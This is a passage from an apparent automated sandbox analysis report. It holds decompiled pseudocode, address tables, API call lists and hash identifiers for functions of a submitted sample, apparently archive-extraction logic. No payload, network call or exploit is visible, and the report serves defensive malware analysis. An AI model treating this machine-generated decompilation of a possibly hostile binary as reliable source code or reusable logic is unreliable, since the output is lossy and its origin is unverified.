									goto L8;
								} else {
									__eflags = _t95 -  *_t100;
									if(_t95 >  *_t100) {
										goto L25;
									} else {
										while(1) {
											L8:
											_t65 =  *((intOrPtr*)(_t116 - 0x10));
											_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 8)))) + 0xc))( *((intOrPtr*)(_t116 + 8)), _t65 +  *((intOrPtr*)(_t116 - 0x18)), 0x10000 - _t65, _t116 - 0x20);
											__eflags = _t67;
											if(_t67 != 0) {
												break;
											}
											_t69 =  *((intOrPtr*)(_t116 - 0x20));
											 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) + _t69;
											__eflags = _t69;
											if(_t69 == 0) {
												goto L25;
											} else {
												__eflags =  *((intOrPtr*)(_t116 - 0x10)) - 0x20;
												if( *((intOrPtr*)(_t116 - 0x10)) <= 0x20) {
													continue;
												} else {
													_t104 = 0;
													_t71 =  *((intOrPtr*)(_t116 - 0x10)) + 0xffffffe0;
													 *((intOrPtr*)(_t116 - 0x14)) = 0;
													__eflags = _t71;
													 *((intOrPtr*)(_t116 - 0x1c)) = _t71;
													if(_t71 <= 0) {
														_t93 =  *((intOrPtr*)(_t116 - 0x18));
														goto L23;
													} else {
														while(1) {
															_t93 =  *((intOrPtr*)(_t116 - 0x18));
															while(1) {
																L15:
																__eflags =  *((char*)(_t104 + _t93)) - 0x37;
																if( *((char*)(_t104 + _t93)) == 0x37) {
																	break;
																}
																__eflags = _t104 - _t71;
																if(__eflags < 0) {
																	_t104 = _t104 + 1;
																	 *((intOrPtr*)(_t116 - 0x14)) = _t104;
																	continue;
																}
																L19:
																if(__eflags == 0) {
																	L23:
																	_t109 = _t109 + _t71;
																	asm("adc ebx, 0x0");
																	 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) - _t71;
																	E00413980(_t93, _t71 + _t93,  *((intOrPtr*)(_t116 - 0x10)));
																	_t121 = _t121 + 0xc;
																	goto L4;
																} else {
																	_t75 = E0040DF2C(_t93 + _t104);
																	__eflags = _t75;
																	if(_t75 != 0) {
																		E00414090(_t113 + 0x28,  *((intOrPtr*)(_t116 - 0x14)) +  *((intOrPtr*)(_t116 - 0x18)), 0x20);
																		_t110 = _t109 +  *((intOrPtr*)(_t116 - 0x14));
																		_t80 =  *((intOrPtr*)(_t116 + 8));
																		 *((intOrPtr*)(_t113 + 0x20)) = _t110;
																		_t98 = 0;
																		asm("adc ebx, ecx");
																		_t111 = _t110 + 0x20;
																		__eflags = _t111;
																		 *((intOrPtr*)(_t113 + 0x24)) = _t85;
																		asm("adc ebx, ecx");
																		_t67 =  *((intOrPtr*)( *_t80 + 0x10))(_t80, _t111, _t85, _t98, _t98);
																		goto L27;
																	} else {
																		 *((intOrPtr*)(_t116 - 0x14)) =  *((intOrPtr*)(_t116 - 0x14)) + 1;
																		__eflags =  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c));
																		if( *((intOrPtr*)(_t116 - 0x14)) <  *((intOrPtr*)(_t116 - 0x1c))) {
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			_t104 =  *((intOrPtr*)(_t116 - 0x14));
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			continue;
																		} else {
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			goto L23;
																		}
																	}
																}
																goto L28;
															}
															__eflags = _t104 - _t71;
															goto L19;
														}
													}
												}
											}
											goto L28;
										}
										L27:
										_t115 = _t67;
									}
								}
							}
							L28:
							 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
							E00403A9C( *((intOrPtr*)(_t116 - 0x24)));
							_t57 = _t115;
							goto L29;
						}
					} else {
						_t57 = 0;
					}
				}
				L29:
				 *[fs:0x0] =  *((intOrPtr*)(_t116 - 0xc));
				return _t57;
			}



























                              0x0040dd90
                              0x0040dd95
                              0x0040dd9b
                              0x0040dda2
                              0x0040dda5
                              0x0040dda9
                              0x0040ddb0
                              0x0040ddbf
                              0x0040ddc8
                              0x0040ddca
                              0x0040ddd1
                              0x0040ddd4
                              0x0040dddf
                              0x0040dde2
                              0x0040dded
                              0x0040ddf0
                              0x0040ddf3
                              0x0040ddf8
                              0x0040ddfb
                              0x0040ddfe
                              0x0040de01
                              0x0040de01
                              0x0040de01
                              0x0040de04
                              0x0040de06
                              0x00000000
                              0x00000000
                              0x0040de0c
                              0x0040de0f
                              0x0040de12
                              0x0040de15
                              0x0040decb
                              0x0040decd
                              0x0040de1b
                              0x0040de1b
                              0x00000000
                              0x0040de1d
                              0x0040de1d
                              0x0040de1f
                              0x00000000
                              0x0040de25
                              0x0040de25
                              0x0040de25
                              0x0040de33
                              0x0040de42
                              0x0040de45
                              0x0040de47
                              0x00000000
                              0x00000000
                              0x0040de4d
                              0x0040de50
                              0x0040de53
                              0x0040de55
                              0x00000000
                              0x0040de57
                              0x0040de57
                              0x0040de5b
                              0x00000000
                              0x0040de5d
                              0x0040de60
                              0x0040de62
                              0x0040de65
                              0x0040de68
                              0x0040de6a
                              0x0040de6d
                              0x0040dec6
                              0x00000000
                              0x0040de6f
                              0x0040de77
                              0x0040de77
                              0x0040de7a
                              0x0040de7a
                              0x0040de7a
                              0x0040de7e
                              0x00000000
                              0x00000000
                              0x0040de80
                              0x0040de82
                              0x0040de84
                              0x0040de85
                              0x00000000
                              0x0040de85
                              0x0040de8c
                              0x0040de8c
                              0x0040deaa
                              0x0040deaa
                              0x0040deac
                              0x0040deaf
                              0x0040deb9
                              0x0040debe
                              0x00000000
                              0x0040de8e
                              0x0040de90
                              0x0040de95
                              0x0040de97
                              0x0040dedf
                              0x0040dee7
                              0x0040deea
                              0x0040deef
                              0x0040def2
                              0x0040def3
                              0x0040def5
                              0x0040def5
                              0x0040def8
                              0x0040deff
                              0x0040df04
                              0x00000000
                              0x0040de99
                              0x0040de99
                              0x0040de9f
                              0x0040dea2
                              0x0040de71
                              0x0040de74
                              0x0040de77
                              0x00000000
                              0x0040dea4
                              0x0040dea4
                              0x0040dea7
                              0x00000000
                              0x0040dea7
                              0x0040dea2
                              0x0040de97
                              0x00000000
                              0x0040de8c
                              0x0040de8a
                              0x00000000
                              0x0040de8a
                              0x0040de77
                              0x0040de6d
                              0x0040de5b
                              0x00000000
                              0x0040de55
                              0x0040df07
                              0x0040df07
                              0x0040df07
                              0x0040de1f
                              0x0040de1b
                              0x0040df09
                              0x0040df0c
                              0x0040df13
                              0x0040df19
                              0x00000000
                              0x0040df19
                              0x0040ddc1
                              0x0040ddc1
                              0x0040ddc1
                              0x0040ddbf
                              0x0040df1b
                              0x0040df21
                              0x0040df29

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-3916222277
                              • Opcode ID: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                              • Instruction ID: cf89379ab294d4739916b9706e3dd1d7b183837ff3903d8a06049ba810aa014c
                              • Opcode Fuzzy Hash: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                              • Instruction Fuzzy Hash: 19515E71E006069BDB14DFA9C881ABFB7B5EF98304F14853AE405BB381D778A9458BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00403113 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1154 403113-40313f call 413954 call 402ee1 call 405841 1161 403141-403156 call 401d1b 1154->1161 1162 403158-40315d 1154->1162 1168 4031b9-4031c1 call 403a9c 1161->1168 1164 403167 1162->1164 1165 40315f-403165 1162->1165 1167 40316a-4031a9 call 4032a8 call 408f0a call 4042ad 1164->1167 1165->1167 1179 4031c6-4031e8 call 401ce1 call 405d0b call 4049dd 1167->1179 1180 4031ab-4031b4 call 401d1b 1167->1180 1174 403298 1168->1174 1176 403299-4032a7 1174->1176 1188 40322a-40327f call 401c80 call 402685 call 403a9c 1179->1188 1189 4031ea-403228 call 409569 call 401d7a call 403a9c * 3 1179->1189 1180->1168 1211 403281 call 40c231 1188->1211 1212 403281 call 40bbc9 1188->1212 1189->1176 1204 403284-403297 call 403a9c * 2 1204->1174 1211->1204 1212->1204
                              C-Code - Quality: 95%
                              			E00403113(intOrPtr* __ecx, void* __eflags) {
				void* _t63;
				intOrPtr _t64;
				intOrPtr _t68;
				intOrPtr _t73;
				intOrPtr* _t82;
				void* _t85;
				void* _t87;
				void* _t121;
				void* _t124;
				intOrPtr _t126;
				intOrPtr* _t129;
				void* _t131;

				E00413954(E004192B0, _t131);
				_t129 = __ecx;
				E00402EE1(_t131 - 0x40);
				_push( *((intOrPtr*)(__ecx + 4)));
				 *((intOrPtr*)(_t131 - 4)) = 0;
				_t63 = E00405841(_t131 - 0x68, _t121); // executed
				if(_t63 != 0) {
					_t64 =  *((intOrPtr*)(__ecx + 0x1c));
					__eflags = _t64;
					if(_t64 == 0) {
						 *((intOrPtr*)(_t131 - 0x10)) = 0;
					} else {
						 *((intOrPtr*)(_t131 - 0x10)) = _t64 + 4;
					}
					E004032A8(_t131 - 0x30, 4);
					 *((intOrPtr*)(_t131 - 0x30)) = 0x41b378;
					_t126 = _t129 + 0x28;
					 *((char*)(_t131 - 4)) = 1;
					_t68 = E00408F0A(_t126,  *_t129, _t131 - 0x30, 0, 0, _t129 + 4,  *((intOrPtr*)(_t131 - 0x10))); // executed
					 *((intOrPtr*)(_t129 + 0x60)) = _t68;
					 *((char*)(_t131 - 4)) = 0;
					E004042AD(_t131 - 0x30);
					__eflags =  *((intOrPtr*)(_t129 + 0x60));
					if( *((intOrPtr*)(_t129 + 0x60)) == 0) {
						E00401CE1(_t131 - 0x1c, _t129 + 0x10);
						 *((char*)(_t131 - 4)) = 2;
						E00405D0B(_t131 - 0x1c);
						_t73 = E004049DD( *((intOrPtr*)(_t131 - 0x1c))); // executed
						__eflags = _t73;
						if(__eflags != 0) {
							E00401C80(_t131 - 0x28, L"Default");
							 *((char*)(_t131 - 4)) = 4;
							E00402685( *((intOrPtr*)(_t129 + 0x1c)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4)))), _t131 - 0x1c, _t131 - 0x28, _t131 - 0x50, 0);
							 *((char*)(_t131 - 4)) = 2;
							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
							_t82 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4))));
							 *((intOrPtr*)(_t129 + 0x60)) =  *((intOrPtr*)( *_t82 + 0x1c))(_t82, 0, 0xffffffff, 0,  *((intOrPtr*)(_t129 + 0x20)));
							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
							goto L11;
						} else {
							_push(_t131 - 0x1c);
							_t124 = 9;
							_t87 = E00409569(_t131 - 0x28, _t124, __eflags);
							 *((char*)(_t131 - 4)) = 3;
							E00401D7A(_t129 + 0x64, _t87);
							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
							 *((intOrPtr*)(_t129 + 0x60)) = 0x80004005;
							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
						}
					} else {
						E00401D1B(_t129 + 0x64,  *0x420320);
						goto L7;
					}
				} else {
					E00401D1B(__ecx + 0x64,  *0x42031c);
					 *((intOrPtr*)(__ecx + 0x60)) = 0x80004005;
					L7:
					_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
					L11:
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t131 - 0xc));
				return _t85;
			}















                              0x00403118
                              0x00403122
                              0x00403128
                              0x0040312d
                              0x00403135
                              0x00403138
                              0x0040313f
                              0x00403158
                              0x0040315b
                              0x0040315d
                              0x00403167
                              0x0040315f
                              0x00403162
                              0x00403162
                              0x0040316f
                              0x00403174
                              0x00403181
                              0x00403184
                              0x00403193
                              0x0040319b
                              0x0040319e
                              0x004031a1
                              0x004031a6
                              0x004031a9
                              0x004031cd
                              0x004031d5
                              0x004031d9
                              0x004031e1
                              0x004031e6
                              0x004031e8
                              0x00403232
                              0x0040323e
                              0x00403258
                              0x00403260
                              0x00403264
                              0x00403279
                              0x00403287
                              0x0040328a
                              0x00403292
                              0x00000000
                              0x004031ea
                              0x004031f0
                              0x004031f3
                              0x004031f4
                              0x004031fd
                              0x00403201
                              0x00403209
                              0x00403211
                              0x00403218
                              0x00403220
                              0x00403225
                              0x004031ab
                              0x004031b4
                              0x00000000
                              0x004031b4
                              0x00403141
                              0x0040314a
                              0x0040314f
                              0x004031b9
                              0x004031bc
                              0x00403298
                              0x00403298
                              0x0040329f
                              0x004032a7

                              APIs
                              • __EH_prolog.LIBCMT ref: 00403118
                                • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 004049DD: __EH_prolog.LIBCMT ref: 004049E2
                                • Part of subcall function 00409569: __EH_prolog.LIBCMT ref: 0040956E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: Default
                              • API String ID: 3519838083-753088835
                              • Opcode ID: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                              • Instruction ID: 6c236086827897a16f525891fa60e3e62c5941a793998487ad20a929e2e28791
                              • Opcode Fuzzy Hash: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                              • Instruction Fuzzy Hash: 76516071900609EFCB10EFA5D8859EEBBB8FF08318F00456FE45277291DB38AA05CB14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00402F15 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116COMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 85%
                              			E00402F15(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _t57;
				void* _t73;
				intOrPtr _t90;
				void* _t109;
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t118;

				E00413954(E00419269, _t118);
				 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) = 0;
				E00403376(_t118 - 0x94);
				 *(_t118 - 4) = 0;
				 *((intOrPtr*)(_t118 - 0x94)) = __ecx;
				E00401D7A(_t118 - 0x90, __edx);
				E00401D7A(_t118 - 0x84,  *((intOrPtr*)(_t118 + 8)));
				_push(0xf0);
				_t90 = E00403A76();
				 *((intOrPtr*)(_t118 + 8)) = _t90;
				 *(_t118 - 4) = 1;
				if(_t90 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = E004034E3(_t90);
				}
				 *(_t118 - 4) = 0;
				 *((intOrPtr*)(_t118 - 0x78)) = _t57;
				E0040640D(_t118 - 0x74, _t57);
				if( *((intOrPtr*)(_t118 + 0xc)) == 0) {
					E00403113(_t118 - 0x94, __eflags);
					goto L8;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xd8)) = 1;
					 *((intOrPtr*)(_t118 + 0xc)) = 0;
					 *(_t118 - 4) = 2;
					_t116 = E00413220(_t118 + 0xc, E004032E1, _t118 - 0x94);
					if(_t116 == 0) {
						 *((intOrPtr*)(_t118 - 0x18)) = 0;
						 *((intOrPtr*)(_t118 - 0x14)) = 0;
						 *((intOrPtr*)(_t118 - 0x10)) = 0;
						E00402170(_t118 - 0x18, 3);
						_t109 = 0x45;
						 *(_t118 - 4) = 3;
						_t73 = E0040602F(_t109);
						 *(_t118 - 4) = 4;
						E00401D7A(_t118 - 0x18, _t73);
						 *(_t118 - 4) = 3;
						E00403A9C( *((intOrPtr*)(_t118 - 0x24)));
						_push(_t118 + 0xc);
						_push(_t118 - 0x18);
						E0040309D( *((intOrPtr*)(_t118 - 0x78)));
						E00403A9C( *((intOrPtr*)(_t118 - 0x18)));
						 *(_t118 - 4) = 0;
						E004131E0(_t118 + 0xc);
						L8:
						_t38 = _t118 + 0x14; // 0x414be4
						_t115 =  *_t38;
						E00401D7A(_t115, _t118 - 0x30);
						__eflags =  *((intOrPtr*)(_t115 + 4));
						if(__eflags == 0) {
							__eflags =  *((intOrPtr*)(_t118 - 0x78)) + 0xe4;
							E00401D7A(_t115,  *((intOrPtr*)(_t118 - 0x78)) + 0xe4);
						}
						_t116 =  *((intOrPtr*)(_t118 - 0x34));
						 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xe0));
					} else {
						E004131E0(_t118 + 0xc);
					}
				}
				 *(_t118 - 4) =  *(_t118 - 4) | 0xffffffff;
				E0040348A(_t118 - 0x94,  *(_t118 - 4)); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t118 - 0xc));
				return _t116;
			}










                              0x00402f1a
                              0x00402f37
                              0x00402f39
                              0x00402f45
                              0x00402f48
                              0x00402f4e
                              0x00402f5c
                              0x00402f61
                              0x00402f6c
                              0x00402f6e
                              0x00402f73
                              0x00402f77
                              0x00402f80
                              0x00402f80
                              0x00402f79
                              0x00402f79
                              0x00402f79
                              0x00402f86
                              0x00402f89
                              0x00402f8c
                              0x00402f94
                              0x0040303d
                              0x00000000
                              0x00402f9a
                              0x00402f9d
                              0x00402fa7
                              0x00402fb9
                              0x00402fc2
                              0x00402fc6
                              0x00402fda
                              0x00402fdd
                              0x00402fe0
                              0x00402fe3
                              0x00402fed
                              0x00402fee
                              0x00402ff2
                              0x00402ffb
                              0x00402fff
                              0x00403004
                              0x0040300b
                              0x00403017
                              0x0040301b
                              0x0040301c
                              0x00403024
                              0x0040302a
                              0x00403030
                              0x00403042
                              0x00403042
                              0x00403042
                              0x0040304b
                              0x00403050
                              0x00403053
                              0x0040305a
                              0x00403060
                              0x00403060
                              0x0040306b
                              0x00403074
                              0x00402fc8
                              0x00402fcb
                              0x00402fcb
                              0x00402fc6
                              0x00403076
                              0x00403080
                              0x0040308d
                              0x00403095

                              APIs
                              • __EH_prolog.LIBCMT ref: 00402F1A
                                • Part of subcall function 00403376: __EH_prolog.LIBCMT ref: 0040337B
                                • Part of subcall function 004034E3: __EH_prolog.LIBCMT ref: 004034E8
                                • Part of subcall function 0040309D: __EH_prolog.LIBCMT ref: 004030A2
                                • Part of subcall function 0040309D: ShowWindow.USER32(00414BE4,00000001,000001F4,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030FB
                                • Part of subcall function 004131E0: CloseHandle.KERNEL32(00000000,00000000,00403035,?,?,00000000,00000003,?,00000000,?,?,00000000,00000000,00000000), ref: 004131EA
                                • Part of subcall function 004131E0: GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 004131F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$CloseErrorHandleLastShowWindow
                              • String ID: KA
                              • API String ID: 2740091781-4133974868
                              • Opcode ID: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                              • Instruction ID: b66072ba2aa71961cefff889ac2f3310996ab01b533407b8592e0c78779ee57e
                              • Opcode Fuzzy Hash: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                              • Instruction Fuzzy Hash: 2F41AF31900249DBCB11EFA5C991AEDBBB8AF14314F1480BFE906B72D2DB385B45CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408902 Relevance: 3.1, APIs: 2, Instructions: 85COMMON
                              Download Yara Rule
                              C-Code - Quality: 50%
                              			E00408902(intOrPtr* __ecx) {
				long _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t39;
				intOrPtr* _t43;
				intOrPtr* _t59;
				long _t62;
				intOrPtr* _t64;
				void* _t65;

				E00413954(E00419B00, _t65);
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				 *((intOrPtr*)(_t65 - 0x14)) = 0;
				 *(_t65 - 4) = 0;
				 *((intOrPtr*)(_t65 - 0x10)) = 0;
				 *(_t65 - 4) = 1;
				if( *((intOrPtr*)(_t65 + 0x10)) == 0) {
					if( *((intOrPtr*)(_t65 + 0x14)) != 0) {
						goto L12;
					} else {
						_push(0x10);
						_t39 = E00403A76();
						if(_t39 == 0) {
							_t64 = 0;
						} else {
							 *((intOrPtr*)(_t39 + 4)) = 0x41b5e8;
							 *((intOrPtr*)(_t39 + 8)) = 0;
							 *(_t39 + 0xc) =  *(_t39 + 0xc) | 0xffffffff;
							 *_t39 = 0x41b494;
							 *((intOrPtr*)(_t39 + 4)) = 0x41b484;
							_t64 = _t39;
						}
						E0040640D(_t65 - 0x14, _t64);
						if(E00406434(_t64,  *((intOrPtr*)(_t59 + 4))) != 0) {
							 *((intOrPtr*)(_t65 + 0x14)) =  *((intOrPtr*)(_t65 - 0x14));
							goto L12;
						} else {
							_t33 = GetLastError();
						}
					}
				} else {
					_push(8);
					_t43 = E00403A76();
					if(_t43 == 0) {
						_t43 = 0;
					} else {
						 *((intOrPtr*)(_t43 + 4)) = 0;
						 *_t43 = 0x41b600;
					}
					E0040640D(_t65 - 0x10, _t43);
					L12:
					_t33 = E00408524(_t59,  *((intOrPtr*)(_t65 + 8)),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x14)),  *((intOrPtr*)(_t65 - 0x10)),  *((intOrPtr*)(_t65 + 0x18))); // executed
				}
				_t62 = _t33;
				_t34 =  *((intOrPtr*)(_t65 - 0x10));
				 *(_t65 - 4) = 0;
				if(_t34 != 0) {
					 *((intOrPtr*)( *_t34 + 8))(_t34);
				}
				_t35 =  *((intOrPtr*)(_t65 - 0x14));
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				if(_t35 != 0) {
					 *((intOrPtr*)( *_t35 + 8))(_t35);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t62;
			}












                              0x00408907
                              0x0040890c
                              0x0040890d
                              0x00408913
                              0x00408915
                              0x00408918
                              0x0040891b
                              0x00408921
                              0x00408925
                              0x0040894e
                              0x00000000
                              0x00408950
                              0x00408950
                              0x00408952
                              0x0040895a
                              0x0040897b
                              0x0040895c
                              0x0040895c
                              0x00408963
                              0x00408966
                              0x0040896a
                              0x00408970
                              0x00408977
                              0x00408977
                              0x00408981
                              0x00408992
                              0x0040899f
                              0x00000000
                              0x00408994
                              0x00408994
                              0x00408994
                              0x00408992
                              0x00408927
                              0x00408927
                              0x00408929
                              0x00408931
                              0x0040893e
                              0x00408933
                              0x00408933
                              0x00408936
                              0x00408936
                              0x00408944
                              0x004089a2
                              0x004089b3
                              0x004089b3
                              0x004089b8
                              0x004089ba
                              0x004089bf
                              0x004089c2
                              0x004089c7
                              0x004089c7
                              0x004089ca
                              0x004089cd
                              0x004089d3
                              0x004089d8
                              0x004089d8
                              0x004089e3
                              0x004089eb

                              APIs
                              • __EH_prolog.LIBCMT ref: 00408907
                              • GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00408AEB,?,?,?,?,?,?,?,00000000), ref: 00408994
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorH_prologLast
                              • String ID:
                              • API String ID: 1057991267-0
                              • Opcode ID: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                              • Instruction ID: a8fc1237ba57e47b0ed65f04e9c7bd5e3c99de29461016f9efabf40ab0132a5b
                              • Opcode Fuzzy Hash: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                              • Instruction Fuzzy Hash: 3F3181B19012499FCB10DF95CA859BEBBA0FF04314B14817FE495B72A1CB388D41CB6A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004051C8 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E004051C8(void* __ecx, intOrPtr* __edx, void* __eflags) {
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t24;
				long _t27;
				void* _t31;
				void* _t41;
				intOrPtr* _t44;
				void* _t46;

				_t51 = __eflags;
				_t39 = __edx;
				E00413954(E0041965C, _t46);
				_t41 = __ecx;
				_t44 = __edx;
				E00405268(_t46 - 0x1c);
				while(1) {
					 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
					_push(_t44);
					_push(_t41);
					_t17 = E0040511B(_t46 - 0x1c, _t39, _t51); // executed
					_t31 = _t46 - 0x1c;
					if(_t17 == 0) {
						break;
					}
					_t21 = E004051A4(_t31);
					_t53 = _t21;
					if(_t21 == 0) {
						_t31 = _t46 - 0x1c;
						break;
					} else {
						 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
						E004051A4(_t46 - 0x1c);
						E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
						_t24 = E004058CD( *_t44, _t39, _t53); // executed
						if(_t24 != 0) {
							L6:
							E00405268(_t46 - 0x1c);
							continue;
						} else {
							if(E0040498D( *_t44) != 0) {
								_t20 = 1;
							} else {
								_t27 = GetLastError();
								_t51 = _t27 - 0xb7;
								if(_t27 != 0xb7) {
									L9:
									_t20 = 0;
									__eflags = 0;
								} else {
									goto L6;
								}
							}
						}
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
					return _t20;
				}
				E004051A4(_t31);
				E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
				goto L9;
			}












                              0x004051c8
                              0x004051c8
                              0x004051cd
                              0x004051d7
                              0x004051d9
                              0x004051de
                              0x004051e3
                              0x004051e3
                              0x004051e7
                              0x004051e8
                              0x004051ec
                              0x004051f3
                              0x004051f6
                              0x00000000
                              0x00000000
                              0x004051f8
                              0x004051fd
                              0x004051ff
                              0x00405243
                              0x00000000
                              0x00405201
                              0x00405201
                              0x00405208
                              0x00405210
                              0x00405218
                              0x0040521f
                              0x00405239
                              0x0040523c
                              0x00000000
                              0x00405221
                              0x0040522a
                              0x00405264
                              0x0040522c
                              0x0040522c
                              0x00405232
                              0x00405237
                              0x00405254
                              0x00405254
                              0x00405254
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405237
                              0x0040522a
                              0x0040521f
